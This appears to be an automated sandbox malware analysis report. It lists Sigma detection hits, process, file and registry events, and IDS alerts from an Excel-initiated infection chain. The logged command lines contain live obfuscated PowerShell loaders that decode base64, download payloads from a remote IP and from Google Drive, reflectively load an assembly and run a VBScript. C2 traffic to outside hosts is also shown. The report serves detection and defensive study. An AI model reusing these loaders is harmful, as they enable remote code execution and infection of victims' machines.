                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" , ProcessId: 2836, ProcessName: wscript.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5k
                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3944, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline", ProcessId: 3316, ProcessName: csc.exe
                Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3556, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3944, TargetFilename: C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS
                Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3556, Protocol: tcp, SourceIp: 188.114.97.3, SourceIsIpv6: false, SourcePort: 443
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" , ProcessId: 2836, ProcessName: wscript.exe
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3944, TargetFilename: C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3556, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))", CommandLine: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgI
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3944, TargetFilename: C:\Users\user\AppData\Local\Temp\mg20lqoj.r4c.ps1

                Data Obfuscation

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3944, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline", ProcessId: 3316, ProcessName: csc.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-25T19:50:46.487667+020020241971A Network Trojan was detected192.3.176.14180192.168.2.2249164TCP
                2024-10-25T19:50:49.146379+020020241971A Network Trojan was detected192.3.176.14180192.168.2.2249166TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-25T19:50:46.487655+020020244491Attempted User Privilege Gain192.168.2.2249164192.3.176.14180TCP
                2024-10-25T19:50:49.146373+020020244491Attempted User Privilege Gain192.168.2.2249166192.3.176.14180TCP
                2024-10-25T19:51:08.991349+020020244491Attempted User Privilege Gain192.168.2.2249171192.3.176.14180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-25T19:51:51.113562+020020243121A Network Trojan was detected192.168.2.224917694.156.177.22080TCP
                2024-10-25T19:51:52.585611+020020243121A Network Trojan was detected192.168.2.224917794.156.177.22080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-25T19:51:50.145221+020020253811Malware Command and Control Activity Detected192.168.2.224917694.156.177.22080TCP
                2024-10-25T19:51:51.616427+020020253811Malware Command and Control Activity Detected192.168.2.224917794.156.177.22080TCP
                2024-10-25T19:51:52.671652+020020253811Malware Command and Control Activity Detected192.168.2.224917894.156.177.22080TCP
                2024-10-25T19:51:53.908424+020020253811Malware Command and Control Activity Detected192.168.2.224917994.156.177.22080TCP
                2024-10-25T19:51:55.330639+020020253811Malware Command and Control Activity Detected192.168.2.224918094.156.177.22080TCP
                2024-10-25T19:51:56.433699+020020253811Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
                2024-10-25T19:51:57.559759+020020253811Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
                2024-10-25T19:51:59.256821+020020253811Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
                2024-10-25T19:52:00.374097+020020253811Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
                2024-10-25T19:52:01.495590+020020253811Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
                2024-10-25T19:52:02.924655+020020253811Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
